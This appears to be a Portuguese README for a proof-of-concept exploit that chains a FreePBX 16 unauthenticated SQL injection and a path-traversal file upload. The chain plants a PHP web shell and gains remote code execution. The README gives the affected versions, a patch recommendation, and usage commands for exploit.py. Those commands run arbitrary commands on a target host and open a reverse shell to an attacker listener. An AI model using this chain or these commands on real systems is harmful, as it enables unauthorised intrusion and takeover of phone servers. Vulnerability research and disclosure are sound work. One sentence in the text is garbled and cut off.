
CVE-2025-57819-RCE_PoC
Resumo: Esta documentação demonstra como combinar duas vulnerabilidades no FreePBX 16 (CVE-2025-57819 e CVE-2025-61678) para construir uma cadeia de ataque completa que evolui do acesso não autenticado à execução remota de código (Remote Code Execution, RCE).
| ID do CVE | Componente Afetado | Impacto e Tipo de Vulnerabilidade |
|---|
| CVE-2025-57819 | Carregador de módulos Endpoint (parâmetro brand) | Injeção SQL empilhada não autenticada (Unauthenticated Stacked SQL Injection) |
| CVE-2025-61678 | Processador de upload de firmware do Endpoint Manager (parâmetro fwbrand) | Upload arbitrário de arquivos autenticado / Path Traversal |
ampusers.fwbrand (../../../var/www/html/<dir>), para gravar um WebShell PHP diretamente no diretório raiz do site.Versões afetadas: FreePBX 16 (versões do módulo Endpoint anteriores a 16.0.92)
FreePBX 17 (corrigido na versão 17.0.6)
Recomendação de correção: atualize para a versão corrigida mais recente o mais rápido possível.
# Executar um único comando
python3 exploit.py --rhost pbx.example.com --command "id"
# Estabelecer um reverse shell interativo (escuta automática com pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# Usar HTTP simples com porta personalizada
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Parâmetro | Descrição |
|---|---|
--rhost | [Obrigatório] Endereço do host de destino (Target Host) |
--rport | Porta de destino (padrão: 443) |
--http | Força o uso de HTTP em vez do HTTPS padrão |